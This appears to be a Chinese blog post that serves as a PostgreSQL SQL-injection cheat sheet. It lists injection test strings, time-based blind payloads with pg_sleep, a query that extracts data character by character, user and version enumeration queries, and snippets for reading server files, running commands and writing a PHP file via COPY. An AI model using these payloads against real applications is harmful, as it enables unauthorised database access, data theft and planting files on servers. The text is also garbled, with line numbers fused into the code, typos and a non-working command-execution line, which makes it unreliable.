1、简单的有回显的SQL注入不用多说,还是基本的SQL语句直接查询就可以了。/
1 #简单的payload2 parameter = 2-13 parameter = 1 and 1 = 24 parameter = 1 or 1 = 2-15 parameter = 1' and '1'='1#and -> or6 parameter = 1' and '1'='2#and -> or或者引号区分发(适用于字符串)1 parameter = 1 #Success2 parameter = 1' #Failed3 parameter = 1'' #Success
2、一般的基于时间的盲注,可以参考下面的办法:
1 #postgresql 的几个简单判断payload:2 parameter=1;select pg_sleep(5)3 parameter=1';select pg_sleep(5)4 parameter=1');select pg_sleep(5)5 parameter=1);select pg_sleep(5)6 parameter=1));select pg_sleep(5)7 parameter=select pg_sleep(5)盲注的逐位猜解1 SELECT CASE WHEN (COALESCE(ASCII(SUBSTR(({current_user}),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+
3、常见的函数查看一些基本信息:
/
1 SELECT version() #查看版本信息2 #查看用户3 SELECT user;4 SELECT current_user;5 SELECT session_user;6 SELECT usename FROM pg_user; #这里是usename不是username7 SELECT getpgusername();8 #查看当前数据库9 SELECT current_database()
4、postgresql下的if
1 #mysql的2 if(expr1,result1,result2);3 #如果expr1满足,result1,否则result24 #对于postgresql6 select case when(expr1) then result1 else result2 end;8 #举个例子9 select casr when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;
5、其他
(1)读取文件:1 select pg_read_file(filepath+filename);(2)执行命令:1 select system("comamnd_string");(3)写入文件:1 COPY (select '<?php phpinfo();?>') to '/tmp/1.php';
若有收获,就点个赞吧
0 人点赞
